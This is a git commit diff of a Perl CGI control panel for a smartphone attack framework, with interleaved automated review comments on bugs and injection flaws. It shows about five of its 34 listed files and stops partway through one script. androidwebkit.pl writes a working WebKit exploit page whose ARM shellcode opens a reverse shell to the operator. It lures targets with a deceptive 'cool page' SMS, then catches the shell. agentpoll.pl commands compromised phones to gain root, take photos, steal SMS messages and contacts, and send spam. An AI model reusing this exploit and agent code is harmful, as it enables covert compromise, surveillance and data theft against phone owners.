
gui back in may god and infosec forgive me

commit 572a20766359b2175b22111127bd772428ab10ef 1 parent ee55179
@georgiaw authored
Showing with 3,576 additions and 0 deletions.
  1. BIN  frameworkgui/AndroidAgent.apk
  2. +47 −0 frameworkgui/CSAttack.pl
  3. +44 −0 frameworkgui/SEAttack.pl
  4. +488 −0 frameworkgui/agentpoll.pl
  5. +113 −0 frameworkgui/androidwebkit.pl
  6. +95 −0 frameworkgui/attach2Agents.pl
  7. +153 −0 frameworkgui/attachMobileModem.pl
  8. BIN  frameworkgui/bulb.jpg
  9. +21 −0 frameworkgui/config
  10. +61 −0 frameworkgui/createDatabase.pl
  11. +45 −0 frameworkgui/directdownload.pl
  12. +65 −0 frameworkgui/escalatePrivileges.pl
  13. +108 −0 frameworkgui/getContacts.pl
  14. +94 −0 frameworkgui/getDatabase.pl
  15. +33 −0 frameworkgui/guessPassword.pl
  16. +66 −0 frameworkgui/guessattack.pl
  17. BIN  frameworkgui/iphone.deb
  18. +43 −0 frameworkgui/lib/SPF.pm
  19. BIN  frameworkgui/littleBulb.jpg
  20. +547 −0 frameworkgui/menu.pl
  21. +97 −0 frameworkgui/myJavaScript.js
  22. +4 −0 frameworkgui/passwd
  23. BIN  frameworkgui/picture.jpg
  24. +401 −0 frameworkgui/poller.pl
  25. +33 −0 frameworkgui/remoteAttack.pl
  26. +9 −0 frameworkgui/search.pl
  27. +65 −0 frameworkgui/sendSMS.pl
  28. +54 −0 frameworkgui/sshattack.pl
  29. +239 −0 frameworkgui/styles.css
  30. +60 −0 frameworkgui/takePic.pl
  31. +20 −0 frameworkgui/test.pl
  32. +118 −0 frameworkgui/viewInfo.pl
  33. +232 −0 frameworkgui/viewInfo2.pl
  34. +221 −0 frameworkgui/viewInfo3.pl
BIN  frameworkgui/AndroidAgent.apk
Binary file not shown
47 frameworkgui/CSAttack.pl
@@ -0,0 +1,47 @@
+#!/usr/bin/perl
+BEGIN { use CGI::Carp qw(fatalsToBrowser); };
+use DBI;
+use Cwd;
+use FindBin qw($Bin);
+use lib "$Bin/lib";
+use SPF;
+use CGI ':cgi-lib';
+
+my %FORM = Vars();
+$exploit = $FORM{"exploit"};
+$hPath = $FORM{"hostingPath"};
+$fileName = $FORM{"fileName"};
+$phNo2Attack = $FORM{"phNo2Attack"};
+$modemNo = $FORM{"modemNoDD2"};
+
+##----- put your code here
+my %Variables = SPF::readconfig();
+my $dbh = SPF::dbconnect(%Variables);
+#print "Content-type: text/html\r\n\r\n";
+$webserver = $Variables{"WEBSERVER"};
+
+$Variables{"OS"} = $^O;
+ $sql = $dbh->prepare("SELECT id FROM modems WHERE number = ?");
+ $results = $sql->execute($modemNo);
+ @rows = $sql->fetchrow_array();
+ $modem = @rows[0];
+@exec = (qw(perl androidwebkit.pl),$hPath,$fileName,$phNo2Attack,$modem);
+ $pid = fork;
+ die "fork failed" unless defined $pid;
+ if ($pid ==0)
+ {
+
+ open STDIN,'<','/dev/null';
+ open STDOUT,'<','/dev/null';
+ open STDERR,'>&STDOUT';
+ exec {$exec[0]} @exec;
+
+
+ }
+
+
+
+##----- end of your code
+
+my $url = "menu.pl";
+print "Location: $url\n\n";
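Review bot: In the child branch, `open STDOUT,'<','/dev/null';` reopens standard output for reading, so writes from the detached child (and from STDERR, which is duplicated from it) fail; the mode should be `'>'`, as in `open STDOUT,'>','/dev/null';`. None of the three `open` calls nor the `exec` is checked, so if `exec` fails the child falls out of the `if` block and runs the redirect code meant for the parent; `exec {$exec[0]} @exec or die "exec failed: $!";` keeps the child from continuing. The same fork block appears in SEAttack.pl, attach2Agents.pl and attachMobileModem.pl in this commit.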
44 frameworkgui/SEAttack.pl
@@ -0,0 +1,44 @@
+#!/usr/bin/perl
+BEGIN { use CGI::Carp qw(fatalsToBrowser); };
+use DBI;
+use Cwd;
+use FindBin qw($Bin);
+use lib "$Bin/lib";
+use SPF;
+use CGI ':cgi-lib';
+
+my %FORM = Vars();
+$platform = $FORM{"platformDD2"};
+$path = $FORM{"hostingPath"};
+$filename = $FORM{"fileName"};
+$number = $FORM{"phNo2Attack"};
+$modemNo = $FORM{"modemNoDD2"};
+
+
+##----- put your code here
+my %Variables = SPF::readconfig();
+my $dbh = SPF::dbconnect(%Variables);
+#print "Content-type: text/html\r\n\r\n";
+$webserver = $Variables{"WEBSERVER"};
+
+$Variables{"OS"} = $^O;
+ $sql = $dbh->prepare("SELECT id FROM modems WHERE number = ?");
+ $results = $sql->execute($modemNo);
+ @rows = $sql->fetchrow_array();
+ $modem = @rows[0];
+@exec = (qw(perl directdownload.pl),$path,$filename,$number,$platform,$modem);
+ $pid = fork;
+ die "fork failed" unless defined $pid;
+ if ($pid ==0)
+ {
+
+ open STDIN,'<','/dev/null';
+ open STDOUT,'<','/dev/null';
+ open STDERR,'>&STDOUT';
+ exec {$exec[0]} @exec;
+ }
+#print $startcommand;
+##----- end of your code
+
+my $url = "menu.pl";
+print "Location: $url\n\n";
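Review bot: The modem lookup result is used without a check: if `modemNoDD2` matches no row, `fetchrow_array` returns an empty list and `$modem` is handed to the child script as undef. `@rows[0]` is also a one-element slice where the scalar `$rows[0]` is meant. A guard such as `die "unknown modem" unless @rows;` after the fetch, together with validating `phNo2Attack`, `hostingPath`, `fileName` and `platformDD2` against anchored patterns before they are passed to `directdownload.pl`, would keep unchecked request data out of the child process. CSAttack.pl has the same lookup and the same unvalidated fields, and neither script enables `use strict; use warnings;`.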
488 frameworkgui/agentpoll.pl
@@ -0,0 +1,488 @@
+#!/usr/bin/perl
+use DBI;
+use Cwd;
+use Expect;
+use IO::Socket;
+use FindBin qw($Bin);
+use lib "$Bin/lib";
+use SPF;
+my %Variables = SPF::readconfig();
+my $dbh = SPF::dbconnect(%Variables);
+$Variables{"OS"} = $^O;
+$ipaddress = $Variables{"IPADDRESS"};
+$webserver = $Variables{"WEBSERVER"};
+$path = $ARGV[0];
+$key = $ARGV[1];
+$id = $ARGV[2];
+while(1)
+ {
+ $fullpath5 = $webserver . $path . "/putfunc";
+ die "Couldn't find $fullpath5!" unless -r $fullpath5;
+ open(PUTFILE, "<",$fullpath5) or die "Couldn't open $fullpath5 for reading! ($!)";
+ $line= <PUTFILE>;
+ close(PUTFILE);
+ open(PUTFILE2, ">",$fullpath5) or die "Couldn't open $fullpath5 for writing! ($!)";;
+ print PUTFILE2;
+ close(PUTFILE2);
+ @split = split(/ /, $line);
+ if (@split[0] eq $key)
+ {
+ if (@split[1] eq "ROOT")
+ {
+ $delivery = @split[2];
+ chomp($delivery);
+ $command = $key . " " . "ROOT";
+ if ($delivery eq "HTTP")
+ {
+ $control = $webserver . $path . "/control";
+ open(CONTROLFILE, ">",$control) or die "Couldn't open $control for writing! ($!)";
+ print CONTROLFILE $command;
+ close(CONTROLFILE);
+ sleep 60;
+ $text = $webserver . $path . "/text.txt";
+ open(TEXTFILE, "<",$text) or die "Couldn't open $text for reading! ($!)";
+ $line= <TEXTFILE>;
+ if ($line eq "Root Succeeded")
+ {
+ $sql = $dbh->prepare("UPDATE data SET root = ? WHERE id = ?");
+ $sql->execute("yes",$id);
+ }
+ close(TEXTFILE);
+ open(TEXTFILE2, ">",$text) or die "Couldn't open $text for writing! ($!)";
+ print TEXTFILE2 "";
+ close(TEXTFILE2);
+ }
+ if ($delivery eq "SMS")
+ {
+ $modem = @split[3];
+ chomp($modem);
+ $sql = $dbh->prepare("SELECT path FROM modems WHERE id = ?");
+ $results = $sql->execute($modem);
+ @rows = $sql->fetchrow_array();
+ $path2 = @rows[0];
+
+ $sql = $dbh->prepare("SELECT controlkey FROM modems WHERE id = ?");
+ $results2 = $sql->execute($modem);
+ @rows = $sql->fetchrow_array();
+ $key2 = @rows[0];
+
+ $sql = $dbh->prepare("SELECT number FROM agents WHERE id = ?");
+ $results = $sql->execute($id);
+ @rows = $sql->fetchrow_array();
+ $number2 = @rows[0];
+
+ $command2 = $key2 . " " . "SEND" . " " . $number2 . " " . $command;
+ $control = $webserver . $path2 . "/getfunc";
+ open(CONTROLFILE, ">",$control) or die "Couldn't open $control for writing! ($!)";
+ print CONTROLFILE $command2;
+ close(CONTROLFILE);
+ sleep 60;
+ $text = $webserver . $path . "/text.txt";
+ open(TEXTFILE, "<",$text) or die "Couldn't open $text for reading! ($!)";
+ $line= <TEXTFILE>;
+ if ($line eq "Root Succeeded")
+ {
+ $sql = $dbh->prepare("UPDATE data SET root = ? WHERE id = ?");
+ $sql->execute("yes",$id);
+ }
+ close(TEXTFILE);
+ open(TEXTFILE2, ">",$text) or die "Couldn't open $text for writing! ($!)";
+ print TEXTFILE2 "";
+ close(TEXTFILE2);
+
+ }
+
+
+ }
+ elsif (@split[1] eq "PICT")
+ {
+ $delivery = @split[2];
+ chomp($delivery);
+ $command = $key . " " . "PICT";
+ if ($delivery eq "HTTP")
+ {
+ $control = $webserver . $path . "/control";
+ open(CONTROLFILE, ">",$control) or die "Couldn't open $control for writing! ($!)";
+ print CONTROLFILE $command;
+ close(CONTROLFILE);
+ sleep 30;
+ $picturefile = $webserver . $path . "/picture.jpg";
+ open(PICTURE, "<",$picturefile) or die "Couldn't open $picturefile for reading! ($!)";
+ if (!(-z PICTURE))
+ {
+ $command = "cp" . " " . $picturefile . " " . ".";
+ system($command);
+ $picturedir = getcwd();
+ $picture = $picturedir . "/" . "picture.jpg";
+ $sql = $dbh->prepare("UPDATE data SET picture = ? WHERE id = ?");
+ $sql->execute($picture,$id);
+ close(PICTURE);
+ open(PICTURE2, ">",$picturefile) or die "Couldn't open $picturefile for writing! ($!)";
+ print PICTURE2 "";
+ close(PICTURE2);
+ }
+
+ }
+ if ($delivery eq "SMS")
+ {
+ $modem = @split[3];
+ chomp($modem);
+ $sql = $dbh->prepare("SELECT path FROM modems WHERE id = ?");
+ $results = $sql->execute($modem);
+ @rows = $sql->fetchrow_array();
+ $path2 = @rows[0];
+ $sql = $dbh->prepare("SELECT controlkey from modems where id = ?");
+ $results2 = $sql->execute($modem);
+ @rows = $sql->fetchrow_array();
+ $key2 = @rows[0];
+ $sql = $dbh->prepare("SELECT number from agents where id = ?");
+ $results = $sql->execute($id);
+ @rows = $sql->fetchrow_array();
+ $number2 = @rows[0];
+ $control = $webserver . $path2 . "/getfunc";
+ open(CONTROLFILE, ">",$control) or die "Couldn't open $control for writing! ($!)";
+ $command2 = $key2 . " " . "SEND" . " " . $number2 . " " . $command;
+ print CONTROLFILE $command2;
+ close(CONTROLFILE);
+ sleep(60);
+ $picturefile = $webserver . $path . "/picture.jpg";
+ open(PICTURE, "<",$picturefile) or die "Couldn't open $picturefile for reading! ($!)";
+ if (!(-z PICTURE))
+ {
+ $command = "cp" . " " . $picturefile . " " . ".";
+ system($command);
+ $picturedir = getcwd();
+ $picture = $picturedir . "/" . "picture.jpg";
+ $sql = $dbh->prepare("UPDATE data SET picture = ? WHERE id = ?");
+ $sql->execute($picture,$id);
+ close(PICTURE);
+ open(PICTURE2, ">",$picturefile) or die "Couldn't open $picturefile for writing! ($!)";
+ print PICTURE2 "";
+ close(PICTURE2);
+ }
+
+ }
+ }
+ elsif (@split[1] eq "SMSS")
+ {
+ $deliverymethod = @split[2];
+ $returnmethod = @split[3];
+ chomp($returnmethod);
+ if ($returnmethod eq "SMS")
+ {
+ $modem = @split[4];
+ chomp($modem);
+ $sql = $dbh->prepare("SELECT path FROM modems WHERE id = ?");
+ $results = $sql->execute($modem);
+ @rows = $sql->fetchrow_array();
+ $path2 = @rows[0];
+ $command = $key . " " . "SMSS" . " " . $returnmethod;
+ if ($deliverymethod eq "HTTP")
+ {
+ $control = $webserver . $path . "/control";
+ open(CONTROLFILE, ">",$control) or die "Couldn't open $control for writing! ($!)";
+ print CONTROLFILE $command;
+ close(CONTROLFILE);
+ sleep 60;
+ $text = $webserver . $path2 . "/text.txt";
+ open(TEXTFILE, "<",$text) or die "Couldn't open $text for reading! ($!)";
+ $line= <TEXTFILE>;
+ $sql = $dbh->prepare("UPDATE data SET sms = ? WHERE id = ?");
+ $sql->execute($line,$id);
+ close(TEXTFILE);
+ open(TEXTFILE2, ">",$text) or die "Couldn't open $text for writing! ($!)";
+ print TEXTFILE2 "";
+ close(TEXTFILE2);
+ }
+ if ($deliverymethod eq "SMS")
+ {
+ print "SMS";
+ $sql = $dbh->prepare("SELECT controlkey FROM modems WHERE id = ?");
+ $results2 = $sql->execute($modem);
+ @rows = $sql->fetchrow_array();
+ $key2 = @rows[0];
+ $sql = $dbh->prepare("SELECT number FROM agents WHERE id = ?");
+ $results = $sql->execute($id);
+ @rows = $sql->fetchrow_array();
+ $number2 = @rows[0];
+ $command2 = $key2 . " " . "SEND" . " " . $number2 . " " . $command;
+ $control = $webserver . $path2 . "/getfunc";
+ open(CONTROLFILE, ">",$control) or die "Couldn't open $control for writing! ($!)";
+ print CONTROLFILE $command2;
+ close(CONTROLFILE);
+ sleep 60;
+ $text = $webserver . $path2 . "/text.txt";
+ open(TEXTFILE, "<",$text) or die "Couldn't open $text for reading! ($!)";
+ $line= <TEXTFILE>;
+ $sql = $dbh->prepare("UPDATE data SET sms = ? WHERE id = ?");
+ $sql->execute($line,$id);
+ close(TEXTFILE);
+ open(TEXTFILE2, ">",$text) or die "Couldn't open $text for writing! ($!)";
+ print TEXTFILE2 "";
+ close(TEXTFILE2);
+ }
+ }
+ if ($returnmethod eq "HTTP")
+ {
+ $command = $key . " " . "SMSS" . " " . "WEB";
+ if ($deliverymethod eq "HTTP")
+ {
+ $control = $webserver . $path . "/control";
+ open(CONTROLFILE, ">",$control) or die "Couldn't open $control for writing! ($!)";
+ print CONTROLFILE $command;
+ close(CONTROLFILE);
+ sleep 30;
+ $text = $webserver . $path . "/text.txt";
+ open(TEXTFILE, "<",$text) or die "Couldn't open $text for reading! ($!)";
+ $line= <TEXTFILE>;
+ $sql = $dbh->prepare("UPDATE data SET sms = ? WHERE id = ?");
+ close(TEXTFILE);
+ open(TEXTFILE2, ">",$text) or die "Couldn't open $text for writing! ($!)";
+ print TEXTFILE2 "";
+ close(TEXTFILE2);
+ $sql->execute($line,$id);
+ }
+ if ($deliverymethod eq "SMS")
+ {
+ $modem = @split[4];
+ chomp($modem);
+ $sql = $dbh->prepare("SELECT path from modems where id = ?");
+ $results = $sql->execute($modem);
+ @rows = $sql->fetchrow_array();
+ $path2 = @rows[0];
+
+ $sql = $dbh->prepare("SELECT controlkey FROM modems WHERE id = ?");
+ $results2 = $sql->execute($modem);
+ @rows = $sql->fetchrow_array();
+ $key2 = @rows[0];
+
+ $sql = $dbh->prepare("SELECT number FROM agents WHERE id = ?");
+ $results = $sql->execute($id);
+ @rows = $sql->fetchrow_array();
+ $number2 = @rows[0];
+
+ $command2 = $key2 . " " . "SEND" . " " . $number2 . " " . $command;
+ $control = $webserver . $path2 . "/getfunc";
+ open(CONTROLFILE, ">",$control) or die "Couldn't open $control for writing! ($!)";
+ print CONTROLFILE $command2;
+ close(CONTROLFILE);
+
+ sleep 60;
+
+ $text = $webserver . $path . "/text.txt";
+ open(TEXTFILE, "<",$text) or die "Couldn't open $text for reading! ($!)";
+ $line= <TEXTFILE>;
+
+ $sql = $dbh->prepare("UPDATE data SET sms = ? WHERE id = ?");
+ $sql->execute($line,$id);
+
+ close(TEXTFILE);
+ open(TEXTFILE2, ">",$text) or die "Couldn't open $text for writing! ($!)";
+ print TEXTFILE2 "";
+ close(TEXTFILE2);
+ }
+ }
+
+ }
+ elsif (@split[1] eq "CONT")
+ {
+ $deliverymethod = @split[2];
+ $returnmethod = @split[3];
+ chomp($returnmethod);
+ if ($returnmethod eq "SMS")
+ {
+ $modem = @split[4];
+ chomp($modem);
+ $sql = $dbh->prepare("SELECT path FROM modems where id = ?");
+ $results = $sql->execute($modem);
+ @rows = $sql->fetchrow_array();
+ $path2 = @rows[0];
+ $command = $key . " " . "CONT" . " " . $returnmethod;
+ if ($deliverymethod eq "HTTP")
+ {
+ $control = $webserver . $path . "/control";
+ open(CONTROLFILE, ">",$control) or die "Couldn't open $control for writing! ($!)";
+ print CONTROLFILE $command;
+ close(CONTROLFILE);
+ sleep 60;
+ $text = $webserver . $path2 . "/text.txt";
+ open(TEXTFILE, "<",$text) or die "Couldn't open $text for reading! ($!)";
+ $line= <TEXTFILE>;
+
+ $insertquery = "UPDATE data SET contacts = ? WHERE id = ?";
+ $sql->execute($line,$id);
+
+ close(TEXTFILE);
+ open(TEXTFILE2, ">",$text) or die "Couldn't open $text for writing! ($!)";
+ print TEXTFILE2 "";
+ close(TEXTFILE2);
+
+
+ }
+ if ($deliverymethod eq "SMS")
+ {
+ $sql = $dbh->prepare("SELECT controlkey FROM modems WHERE id = ?");
+ $results2 = $sql->execute($modem);
+ @rows = $sql->fetchrow_array();
+ $key2 = @rows[0];
+
+ $sql = $dbh->prepare("SELECT number from agents where id=?");
+ $results = $sql->execute($id);
+ @rows = $sql->fetchrow_array();
+ $number2 = @rows[0];
+
+ $command2 = $key2 . " " . "SEND" . " " . $number2 . " " . $command;
+ $control = $webserver . $path2 . "/getfunc";
+ open(CONTROLFILE, ">",$control) or die "Couldn't open $control for writing! ($!)";
+ print CONTROLFILE $command2;
+ close(CONTROLFILE);
+ sleep 60;
+ $text = $webserver . $path2 . "/text.txt";
+ open(TEXTFILE, "<",$text) or die "Couldn't open $text for reading! ($!)";
+ $line= <TEXTFILE>;
+ $sql = $dbh->prepare("UPDATE data SET contacts=? WHERE id=?");
+ $sql->execute($line,$id);
+
+ close(TEXTFILE);
+ open(TEXTFILE2, ">",$text) or die "Couldn't open $text for writing! ($!)";
+ print TEXTFILE2 "";
+ close(TEXTFILE2);
+
+
+ }
+
+ }
+
+ if ($returnmethod eq "HTTP")
+ {
+ $command = $key . " " . "CONT" . " " . "WEB";
+ if ($deliverymethod eq "HTTP")
+ {
+ $control = $webserver . $path . "/control";
+ open(CONTROLFILE, ">",$control) or die "Couldn't open $control for writing! ($!)";
+ print CONTROLFILE $command;
+ close(CONTROLFILE);
+ sleep 30;
+ $text = $webserver . $path . "/text.txt";
+ open(TEXTFILE, "<",$text) or die "Couldn't open $text for reading! ($!)";
+ $line= <TEXTFILE>;
+ $sql = $dbh->prepare("UPDATE data SET contacts = ? WHERE id = ?");
+ $sql->execute($line,$id);
+
+ close(TEXTFILE);
+ open(TEXTFILE2, ">",$text) or die "Couldn't open $text for writing! ($!)";
+ print TEXTFILE2 "";
+ close(TEXTFILE2);
+ }
+ if ($deliverymethod eq "SMS")
+ {
+ $modem = @split[4];
+ chomp($modem);
+ $sql = $dbh->prepare("SELECT path FROM modems WHERE id=?");
+ $results = $sql->execute($modem);
+ @rows = $sql->fetchrow_array();
+ $path2 = @rows[0];
+
+ $sql = $dbh->prepare("SELECT controlkey from modems where id=?");
+ $results2 = $sql->execute($modem);
+ @rows = $sql->fetchrow_array();
+ $key2 = @rows[0];
+
+ $sql = $dbh->prepare("SELECT number from agents where id=?");
+ $results = $sql->execute($id);
+ @rows = $sql->fetchrow_array();
+ $number2 = @rows[0];
+
+ $sql = $dbh->prepare("SELECT type from modems where id=?");
+ $results = $sql->execute($modem);
+ @rows = $sql->fetchrow_array();
+ $type2 = @rows[0];
+
+ if ($type2 eq "app")
+ {
+ $command2 = $key2 . " " . "SEND" . " " . $number2 . " " . $command;
+ $control = $webserver . $path2 . "/getfunc";
+ open(CONTROLFILE, ">",$control) or die "Couldn't open $control for writing! ($!)";
+ print CONTROLFILE $command2;
+ close(CONTROLFILE);
+ sleep 60;
+ $text = $webserver . $path . "/text.txt";
+ open(TEXTFILE, "<",$text) or die "Couldn't open $text for reading! ($!)";
+ $line= <TEXTFILE>;
+
+ $sql = $dbh->prepare("UPDATE data SET contacts=? WHERE id=?");
+ $sql->execute($line,$id);
+ close(TEXTFILE);
+ open(TEXTFILE2, ">",$text) or die "Couldn't open $text for writing! ($!)";
+ print TEXTFILE2 "";
+ close(TEXTFILE2);
+ }
+
+ }
+ }
+
+ }
+ elsif (@split[1] eq "SPAM")
+ {
+ $modem = @split[2];
+ $sendnumber = @split[4];
+ $deliverymethod = @split[3];
+ $splitlength = @split;
+ $end = $splitlength - 1;
+ $sendmessage = @split[5];
+ if ($end > 5)
+ {
+ for ($i = 6; $i<=$end; $i++)
+ {
+ $sendmessage .= " ";
+ $sendmessage .= @split[$i];
+ }
+ }
+ $command = $key . " " . "SPAM" . " " . $sendnumber . " " . $sendmessage;
+ if ($deliverymethod eq "HTTP")
+ {
+ $control = $webserver . $path . "/control";
+ open(CONTROLFILE, ">",$control) or die "Couldn't open $control for writing! ($!)";
+ print CONTROLFILE $command;
+ close(CONTROLFILE);
+ }
+ if ($deliverymethod eq "SMS")
+ {
+ $sql = $dbh->prepare("SELECT path from modems where id=?");
+ $results = $sql->execute($modem);
+ @rows = $sql->fetchrow_array();
+ $path2 = @rows[0];
+
+ $sql = $dbh->prepare("SELECT type from modems where id=?");
+ $results = $sql->execute($modem);
+ @rows = $sql->fetchrow_array();
+ $type2 = @rows[0];
+
+ $sql = $dbh->prepare("SELECT controlkey from modems where id=?");
+ $results2 = $sql->execute($modem);
+ @rows = $sql->fetchrow_array();
+ $key2 = @rows[0];
+
+ $sql = $dbh->prepare("SELECT number from agents where id=?");
+ $results = $sql->execute($id);
+ @rows = $sql->fetchrow_array();
+ $number2 = @rows[0];
+
+ chomp($type2);
+ if ($type2 eq "app")
+ {
+ $control = $webserver . $path2 . "/getfunc";
+ $command2 = $key2 . " " . "SEND" . " " . $number2 . " " . $command;
+ open(CONTROLFILE, ">",$control) or die "Couldn't open $control for writing! ($!)";
+ print CONTROLFILE $command2;
+ close(CONTROLFILE);
+ }
+ }
+
+
+ }
+
+
+ }
+}
+
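Review bot: In the CONT branch with SMS return and HTTP delivery, `$insertquery` is assigned but never prepared, so the following `$sql->execute($line,$id)` runs on the statement handle left over from `SELECT path FROM modems where id = ?` with two bind values and the contacts are never stored; the sibling branches call `$sql = $dbh->prepare("UPDATE data SET contacts = ? WHERE id = ?");` before the execute. Both PICT branches build `"cp" . " " . $picturefile . " " . "."` and pass it to `system` as a single string, so the shell parses a path derived from `$ARGV[0]`; the list form `system("cp", $picturefile, ".")` or `File::Copy::copy` avoids the shell. The outer `while(1)` has no sleep when `putfunc` holds no command for this key, so the process spins on the file.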
113 frameworkgui/androidwebkit.pl
@@ -0,0 +1,113 @@
+#!/usr/bin/perl
+use Cwd;
+use DBI;
+use Expect;
+use IO::Socket;
+use FindBin qw($Bin);
+use lib "$Bin/lib";
+use SPF;
+my %Variables = SPF::readconfig();
+my $dbh = SPF::dbconnect(%Variables);
+$webserver = $Variables{"WEBSERVER"};
+ $ipaddress = $Variables{"IPADDRESS"};
+ $shellipaddress = $Variables{"SHELLIPADDRESS"};
+ $path = $ARGV[0];
+ $filename = $ARGV[1];
+ $number = $ARGV[2];
+ $modem = $ARGV[3];
+ $link = "http://" . $ipaddress . $path . $filename;
+ $fullpath = $webserver. $path;
+ $command1 = "mkdir " . $fullpath;
+ system($command1);
+ $ipaddresscopy = $shellipaddress;
+ @octets = split(/\./, $ipaddresscopy);
+ $out1 = pack "c", @octets[0];
+ $hex1 = unpack "H2" , $out1;
+ $out2 = pack "c", @octets[1];
+ $hex2 = unpack "H2" , $out2;
+ $out3 = pack "c", @octets[2];
+ $hex3 = unpack "H2" , $out3;
+ $out4 = pack "c", @octets[3];
+ $hex4 = unpack "H2" , $out4;
+ $sploitfile = $webserver . $path . $filename;
+ $command8 = "touch " . $sploitfile;
+ system($command8);
+ $command9 = "chmod 777 " . $sploitfile;
+ system($command9);
+ open(SPLOITFILE, ">",$sploitfile) or die "Couldn't open $sploitfile for writing! ($!)";
+ print SPLOITFILE "<html>\n";
+ print SPLOITFILE "<head>\n";
+ print SPLOITFILE "<script>\n";
+ print SPLOITFILE "var ip = unescape(\"\\u" . $hex2 . $hex1 . "\\u" . $hex4 . $hex3 . "\");\n";
+ print SPLOITFILE "var port = unescape(\"\\u3930\");\n";
+ print SPLOITFILE "function trigger()\n";
+ print SPLOITFILE "{\n";
+ print SPLOITFILE "var span = document.createElement(\"div\");\n";
+ print SPLOITFILE "document.getElementById(\"BodyID\").appendChild(span);\n";
+ print SPLOITFILE "span.innerHTML = -parseFloat(\"NAN(ffffe00572c60)\");\n";
+ print SPLOITFILE "}\n";
+ print SPLOITFILE "function exploit()\n";
+ print SPLOITFILE "{\n";
+ print SPLOITFILE "var nop = unescape(\"\\u33bc\\u0057\");\n";
+ print SPLOITFILE "do\n";
+ print SPLOITFILE "{\n";
+ print SPLOITFILE "nop+=nop;\n";
+ print SPLOITFILE "} while (nop.length<=0x1000);\n";
+ print SPLOITFILE "var scode = nop+unescape(\"\\u1001\\ue1a0\\u0002\\ue3a0\\u1001\\ue3a0\\u2005\\ue281\\u708c\\ue3a0\\u708d\\ue287\\u0080\\uef00\\u6000\\ue1a0\\u1084\\ue28f\\u2010\\ue3a0\\u708d\\ue3a0\\u708e\\ue287\\u0080\\uef00\\u0006\\ue1a0\\u1000\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u0006\\ue1a0\\u1001\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u0006\\ue1a0\\u1002\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u2001\\ue28f\\uff12\\ue12f\\u4040\\u2717\\udf80\\ua005\\ua508\\u4076\\u602e\\u1b6d\\ub420\\ub401\\u4669\\u4052\\u270b\\udf80\\u2f2f\\u732f\\u7379\\u6574\\u2f6d\\u6962\\u2f6e\\u6873\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u0002\");\n";
+ print SPLOITFILE "scode += port;\n";
+ print SPLOITFILE "scode += ip;\n";
+ print SPLOITFILE "scode += unescape(\"\\u2000\\u2000\");\n";
+ print SPLOITFILE "target = new Array();\n";
+ print SPLOITFILE "for(i = 0; i < 0x1000; i++)\n";
+ print SPLOITFILE "target[i] = scode;\n";
+ print SPLOITFILE "for (i = 0; i <= 0x1000; i++)\n";
+ print SPLOITFILE "{\n";
+ print SPLOITFILE "document.write(target[i]+\"<i>\");\n";
+ print SPLOITFILE "if (i>0x999)\n";
+ print SPLOITFILE "{\n";
+ print SPLOITFILE "trigger();\n";
+ print SPLOITFILE "}\n";
+ print SPLOITFILE "}\n";
+ print SPLOITFILE "}\n";
+ print SPLOITFILE "</script>\n";
+ print SPLOITFILE "</head>\n";
+ print SPLOITFILE "<body id=\"BodyID\">\n";
+ print SPLOITFILE "Enjoy!\n";
+ print SPLOITFILE "<script>\n";
+ print SPLOITFILE "exploit();\n";
+ print SPLOITFILE "</script>\n";
+ print SPLOITFILE "</body>\n";
+ print SPLOITFILE "</html>\n";
+ close(SPLOITFILE);
+
+ $sql = $dbh->prepare("SELECT path from modems where id=?");
+ $results = $sql->execute($modem);
+ @rows = $sql->fetchrow_array();
+ $path2 = @rows[0];
+
+ $sql = $dbh->prepare("SELECT controlkey from modems where id=?");
+ $results2 = $sql->execute($modem);
+ @rows = $sql->fetchrow_array();
+ $key2 = @rows[0];
+
+ $control = $webserver . $path2 . "/getfunc";
+ open(CONTROLFILE, ">",$control) or die "Couldn't open $control for writing! ($!)";
+ $command2 = $key2 . " " . "SEND" . " " . $number . " " . "This is a cool page: " . $link;
+ print CONTROLFILE $command2;
+ close(CONTROLFILE);
+ $vulnerable = "no";
+ $socket = new IO::Socket::INET (LocalHost => $shellipaddress, LocalPort => '12345', Proto => 'tcp' , Listen => 1, Reuse => 1, Timeout=> 180);
+ if ($data_socket = $socket->accept())
+ {
+ $data="/system/bin/id\n";
+ print $data_socket $data;
+ $data=<$data_socket>;
+ print $data;
+ close($data_socket);
+ $vulnerable = "yes";
+ }
+
+
+
+ $sql = $dbh->prepare("INSERT INTO client (id,number,exploit,vuln) VALUES (DEFAULT,?,?,?)");
+ $sql->execute($number,"webkit",$vulnerable);
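Review bot: `$path` and `$filename` arrive from `@ARGV` (CSAttack.pl fills them from the `hostingPath` and `fileName` form fields) and are concatenated into `mkdir`, `touch` and `chmod 777` command strings run through single-argument `system`, so any shell metacharacter in the request is interpreted by the shell on the host running the framework. Perl's built-ins avoid the shell entirely, e.g. `mkdir $fullpath or die "mkdir $fullpath: $!";`, and the `touch` is redundant because the `open(SPLOITFILE, ">", ...)` that follows creates the file. `chmod 0644, $sploitfile;` is enough for the web server to read it, whereas 777 leaves it writable by every local user. The values should also be checked against an anchored allow-list pattern and rejected if they contain `..`. attach2Agents.pl and attachMobileModem.pl build the same command strings from form input.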
95 frameworkgui/attach2Agents.pl
@@ -0,0 +1,95 @@
+#!/usr/bin/perl
+BEGIN { use CGI::Carp qw(fatalsToBrowser); };
+use DBI;
+use Cwd;
+use FindBin qw($Bin);
+use lib "$Bin/lib";
+use SPF;
+use CGI ':cgi-lib';
+
+my %FORM = Vars();
+$number1 = $FORM{"agentPhNo"};
+$number21 = $FORM{"controlPhNo"};
+$path1 = $FORM{"agentURLPath"};
+$key1 = $FORM{"agentControlKey"};
+$platform1 = $FORM{"platformDD1"};
+
+
+##----- put your code here
+my %Variables = SPF::readconfig();
+my $dbh = SPF::dbconnect(%Variables);
+$Variables{"OS"} = $^O;
+ $webserver = $Variables{"WEBSERVER"};
+ $fullpath = $webserver. $path;
+ $command1 = "mkdir " . $fullpath;
+ system($command1);
+ $controlfile = $fullpath . "/control";
+ $command2 = "touch " . $controlfile;
+ system($command2);
+ $command3 = "chmod 777 " . $controlfile;
+ system($command3);
+ $picturefile = $fullpath . "/picture.jpg";
+ $command4 = "touch " . $picturefile;
+ system($command4);
+ $command5 = "chmod 777 " . $picturefile;
+ system($command5);
+ $textfile = $fullpath . "/text.txt";
+ $command6 = "touch " . $textfile;
+ system($command6);
+ $command7 = "chmod 777 " . $textfile;
+ system($command7);
